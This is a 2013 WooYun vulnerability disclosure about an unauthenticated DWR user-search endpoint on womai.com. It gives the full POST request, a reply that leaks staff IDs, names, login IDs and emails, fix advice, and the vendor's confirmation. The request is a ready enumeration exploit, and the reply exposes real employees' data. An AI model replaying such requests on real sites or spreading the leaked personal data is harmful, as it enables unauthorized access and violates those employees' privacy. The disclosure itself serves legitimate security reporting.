当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-023591

漏洞标题:中粮我买网信息泄露

相关厂商:中粮我买网

漏洞作者: 刺刺

提交时间:2013-05-12 23:03

修复时间:2013-06-26 23:04

公开时间:2013-06-26 23:04

漏洞类型:重要敏感信息泄露

危害等级:低

自评Rank:1

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-05-12: 细节已通知厂商并且等待厂商处理中
2013-05-14: 厂商已经确认,细节仅向厂商公开
2013-05-24: 细节向核心白帽子及相关领域专家公开
2013-06-03: 细节向普通白帽子公开
2013-06-13: 细节向实习白帽子公开
2013-06-26: 细节向公众公开

简要描述:

信息泄露

详细说明:

已经公开的“海信商城dwr类测试地址暴露,可查询内部敏感信息”,链接:
WooYun: 海信商城dwr类测试地址暴露,可查询内部敏感信息
其中提到的比较实用的就是:
http://shop.hisense.com/dwr/test/DWRSearchUserService
可以查询后台(或前台)用户的id LoginID 、Realname和Email
当时随手测试了我买网,发现没有类似的链接:
http://www.womai.com/dwr/test/DWRSearchUserService
但是事实不是这样的,因为dwr不是这样理解的。
只要在/WEB-INF/dwr.xml配置了该方法,这个dwr就可以执行的。
因此这个操作与有没有/dwr/index.html文件没有关系。
DWRSearchUserService
对应的链接是:
/dwr/call/plaincall/DWRSearchUserService.search.dwr
提交内容如下:
POST /dwr/call/plaincall/DWRSearchUserService.search.dwr HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://www.womai.com/dwr/test/DWRSearchUserService
Content-Type: text/plain
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: www.womai.com
Content-Length: 249
Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=7591D622F50D83C26C7F1585008F3170.worker1
callCount=1
page=/dwr/test/DWRSearchUserService
httpSessionId=7591D622F50D83C26C7F1585008F3170.worker1
scriptSessionId=D600EB6AB103BDDF72E434C5EF5B44D0436
c0-scriptName=DWRSearchUserService
c0-methodName=search
c0-id=0
c0-param0=string:wm
batchId=0
这里是关键词搜索keyword配置部分是c0-param0=string:此处是wm,
程序代码配置了每次取15个结果输出;
返回的内容:
HTTP/1.1 200 OK
Server: cofcoweb
Date: Fri, 10 May 2013 07:02:36 GMT
Content-Type: text/javascript;charset=utf-8
Content-Length: 801
Connection: keep-alive
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Set-Cookie: JSESSIONID=466B9F2959DBA50425D3D5D4B3D01340; Path=/
Set-Cookie: NSC_wt.mc.xpnbj=ffffffff090e172d45525d5f4f58455e445a4a423660;expires=Fri, 10-May-2013 07:32:37 GMT;path=/;httponly
throw 'allowScriptTagRemoting is false.';
//#DWR-INSERT
//#DWR-REPLY
dwr.engine._remoteHandleCallback('0','0',["822205,\u6D4B\u8BD5,wm123456,null","7597941,\u5B89\u71D5,wmanyan,an@cofco.com","489757,\u67CF\u7433,wmbailin,wmbailin","7529405,\u767D\u9E25,wmbaiou,bai@cofco.com","2245307,\u767D\u5A77,wmbaiting,bait","709914,\u5305\u854A,wmbaorui,wmbaorui","8047977,\u5305\u745C\u534E,wmbaoyuhua,baoyuhua","7473835,\u5E03\u6676\u6676,wmbujingjing,bu@cofco.com","2259159,\u8521\u4E3D\u743C,wmcailiqiong,caili","720765,\u8521\u68A6\u56ED,wmcaimengyuan,wmcaimengyuan","1710384,\u8521\u5FD7\u5CF0,wmcaizhifeng,caizhifeng","9057327,\u66F9\u6625\u6885,wmcaochm,caocu","7529432,\u66F9\u6625\u59B9,wmcaochunmei,cao@womai.com","622647,ceshi,wmceshi,wmceshi","2246807,\u67F4\u7EDA\u5A55,wmchaixuanjie,chai"]);

漏洞证明:

使用fiddle提交测试:

wmuse.png


返回结果中
\u6D4B\u8BD5 这是中文的unicode形式;
document.write输出:

08.png


结果如下:

6.png


################
修改c0-param0=string:的词语,可以猜解其他的帐号输出。

修复方案:

1. 检查dwr.xml文件中所有方法,是否是正在使用的功能,如果有不使用的,建议剔除关闭;‘
2. 检查已使用dwr方法,区分前台和后台的权限,特别是后台的,建议增加权限验证;
比如DWRSearchUserService,应该不是前台使用的。(当时以为是注册使用的,但是看了一下注册是另外的dwr)
3.本来这个小问题,可以增加到信景商城的汇总中,但是那个发布以后就不能修改了;
暂时只好先告知你们,问题比较小,其他的dwr方法如何利用还要看代码分析和测试;

版权声明:转载请注明来源 刺刺@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2013-05-14 14:44

厂商回复:

感谢大神提交,的确涉及敏感信息。我们尽快安排修复。P.S:rank分给得较高,弥补上次那个严重漏洞的差额。 多谢。礼物会与上次一并发出。

最新状态:

暂无